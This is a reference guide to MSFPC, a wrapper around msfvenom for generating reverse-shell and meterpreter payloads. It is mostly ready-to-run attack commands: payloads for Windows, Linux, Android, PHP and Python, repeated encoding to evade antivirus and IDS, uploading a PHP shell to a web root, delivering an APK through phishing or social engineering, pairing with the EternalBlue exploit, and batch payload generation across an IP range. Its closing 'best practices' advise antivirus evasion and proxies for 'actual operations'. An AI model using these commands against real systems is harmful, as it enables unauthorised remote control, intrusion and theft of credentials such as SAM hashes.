MSFPC

Overview

MSFPC (MSFvenom Payload Creator) is a streamlined Bash wrapper around msfvenom that simplifies payload generation without memorizing complex syntax. Instead of crafting lengthy msfvenom commands, MSFPC uses simple parameters: target IP, port, and payload type.

Installation

Kali Linux / Debian-based

# MSFPC comes pre-installed in Kali Linux
which msfpc

# Or install manually
git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
chmod +x msfpc.sh
sudo ln -s $(pwd)/msfpc.sh /usr/local/bin/msfpc

macOS

brew tap g0tmi1k/msfpc
brew install msfpc

Manual Installation

git clone https://github.com/g0tmi1k/msfpc.git
cd msfpc
bash msfpc.sh <LHOST> <TYPE>

Basic Syntax

Command	Description
msfpc <LHOST> <TYPE>	Generate payload with default settings
msfpc <LHOST> <TYPE> <LPORT>	Specify custom listening port
msfpc <LHOST> <TYPE> <LPORT> <ENCODER>	Add payload encoder
msfpc -h	Display help menu
msfpc -v	Show version information

Payload Types

Windows Payloads

Type	Description	Staged
windows	Windows reverse shell (auto-selects architecture)	No
windows-staged	Windows staged payload (meterpreter)	Yes
windows-bind	Windows bind shell (listening on target)	No
windows/meterpreter/reverse_tcp	Full meterpreter session	Yes
windows/shell/reverse_tcp	Simple cmd.exe shell	Yes
windows/shell_reverse_tcp	Stageless reverse shell	No

Linux Payloads

Type	Description	Staged
linux	Linux reverse shell (auto-selects architecture)	No
linux-staged	Linux staged payload	Yes
linux-bind	Linux bind shell	No
linux/x86/meterpreter/reverse_tcp	32-bit meterpreter	Yes
linux/x64/meterpreter/reverse_tcp	64-bit meterpreter	Yes
linux/x86/shell/reverse_tcp	32-bit shell	Yes

macOS Payloads

Type	Description
macos	macOS reverse shell
macos-staged	macOS staged payload
osx/x64/shell_reverse_tcp	macOS 64-bit reverse shell

Mobile & Web Payloads

Type	Description	Format
android	Android APK payload	.apk
android-staged	Android staged meterpreter	.apk
php	PHP reverse shell	.php
php-staged	PHP staged payload	.php
python	Python reverse shell	.py
python-staged	Python staged payload	.py
bash	Bash reverse shell	.sh
perl	Perl reverse shell	.pl
java	Java reverse shell	.jar
jsp	Java Server Pages shell	.jsp
aspx	ASP.NET reverse shell	.aspx

Staged vs Stageless Payloads

Staged Payloads

# Two-part delivery: small stub downloads full payload
msfpc 192.168.1.100 windows-staged 4444

# Pros: Smaller initial payload, evasion
# Cons: Two-stage delivery required, requires handler
# Use: Firewall constraints, low bandwidth

Stageless Payloads

# Full payload in one executable
msfpc 192.168.1.100 windows 4444

# Pros: Single executable, works without handler
# Cons: Larger file size, easier to detect
# Use: Direct execution, reliability required

Common Encoder Options

Encoder	Description	Effectiveness
x86/shikata_ga_nai	Polymorphic XOR encoder	High
x86/jmp_call_additive	JMP/CALL XOR encoder	Medium
x64/xor	64-bit XOR encoder	Medium
x86/fnstenv_mov	FPU instruction encoder	Medium
x86/countdown	Counter-based encoding	Low

Using Encoders

# Single encoding iteration
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai

# Multiple iterations (harder to detect)
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 5

Output Formats

MSFPC automatically detects format based on payload type:

Format	Extensions	Use Case
Executable	.exe, .bin	Direct execution on Windows
Script	.py, .pl, .sh, .php	Interpretation by runtime
APK	.apk	Android installation
JAR	.jar	Java execution
ASP	.aspx, .asp	Web server shells

Custom Output

# Specify output filename
msfpc 192.168.1.100 windows 4444 -o payload.exe

# List available formats
msfpc -l

Multi-Handler Setup

Using Resource Script

# Generate resource script for multi/handler
msfpc 192.168.1.100 windows 4444 -r

# Output: resource.rc (auto-generated)

Manual Multi-Handler

# Start msfconsole with resource script
msfconsole -r resource.rc

# Or configure manually in msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run

Handler Commands in Meterpreter

Command	Description
sessions -l	List active sessions
sessions -i <ID>	Interact with session
sysinfo	Get target system info
getuid	Get current user
hashdump	Dump SAM hashes (Windows)

Quick Reference Examples

Windows Meterpreter Reverse Shell (Staged)

msfpc 192.168.1.10 windows-staged 8888 -r
# Generates: msfpc-output/windows-windows-meterpreter-reverse-tcp-8888.exe
# Resource file: resource.rc for multi/handler setup

Linux Stageless Reverse Shell

msfpc 10.0.0.50 linux 5555
# Generates: linux-x86-reverse-tcp-5555
# ELF executable, ready to run

Android APK Payload

msfpc 192.168.1.100 android 9999 -r
# Generates: android-reverse-tcp-9999.apk
# Install with: adb install android-reverse-tcp-9999.apk

PHP Web Shell

msfpc 192.168.1.100 php 7777
# Generates: php-reverse-tcp-7777.php
# Upload to web server and access via browser

Python Reverse Shell

msfpc 10.10.10.10 python 3333
# Generates: python-reverse-tcp-3333.py
# Execute: python3 python-reverse-tcp-3333.py

Windows with Encoding

msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 3
# Generates encoded payload with 3 iterations
# Reduces AV detection

Common Scenarios

Post-Exploitation Staged Delivery

# Generate small initial payload
msfpc 192.168.1.100 windows-staged 4444 -r

# Upload to target via phishing/web exploit
# Minimal file size, requires handler listening
# Handler setup: msfconsole -r resource.rc

Firewall Evasion

# Use high port number (firewall bypass)
msfpc 192.168.1.100 windows-staged 8888 x86/shikata_ga_nai -i 5

# Encode multiple times to bypass IDS/AV

Web Application RCE

# For PHP vulnerability in web app
msfpc 192.168.1.100 php 5555

# Copy .php file to web directory
cp php-reverse-tcp-5555.php /var/www/html/shell.php

# Trigger via browser: http://target.com/shell.php

Mobile Penetration Test

# Generate APK for target Android device
msfpc 192.168.1.100 android 6666

# Install on rooted device or via phishing
adb install android-reverse-tcp-6666.apk

# Or use social engineering to get user to install

Output Directory Structure

# MSFPC creates organized output
~/msfpc-output/
├── windows-windows-meterpreter-reverse-tcp-4444.exe
├── resource.rc          # Multi-handler setup
├── payload.txt          # Command reference
└── handler.sh           # Handler launch script

Troubleshooting

Issue	Solution
Command not found	Install msfpc or add to PATH
msfvenom errors	Ensure Metasploit Framework is installed
Port already in use	Use different LPORT value
Staged payload won’t connect	Verify multi-handler is running
Antivirus detection	Use encoder option: -x86/shikata_ga_nai -i 5
Architecture mismatch	Specify x86 or x64 explicitly

Integration with Other Tools

Combining with Reverse Shell Handlers

# MSFPC generates payload
msfpc 192.168.1.100 windows 4444

# Use with netcat if no Metasploit available
nc -lnvp 4444

# Or socat for more control
socat TCP-LISTEN:4444,reuseaddr EXEC:bash,pty,stderr

Delivery via Exploit Framework

# Generate payload
msfpc 192.168.1.100 windows-staged 8888 -r

# Use in MSFconsole exploit
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 8888
exploit

Advanced Tips

Batch Payload Generation

# Generate multiple payloads for different targets
for ip in 192.168.1.{50..60}; do
  msfpc $ip windows-staged 4444
done

Obfuscation Techniques

# Chain multiple encoders
msfpc 192.168.1.100 windows 4444 x86/shikata_ga_nai -i 7

# Output as different format
msfpc 192.168.1.100 windows 4444 -o shellcode.bin

Resource Script Automation

# Auto-generate handler and launch
msfpc 192.168.1.100 windows-staged 4444 -r
msfconsole -r resource.rc < /dev/null &

# Payload ready for delivery

Security Best Practices

• Always set up multi-handler before sending staged payloads
• Use encoding on all payloads to evade antivirus
• Clean up generated payloads after use
• Store LHOST/LPORT securely (not in scripts)
• Use VPN/proxy for actual operations
• Test payloads in isolated lab environment first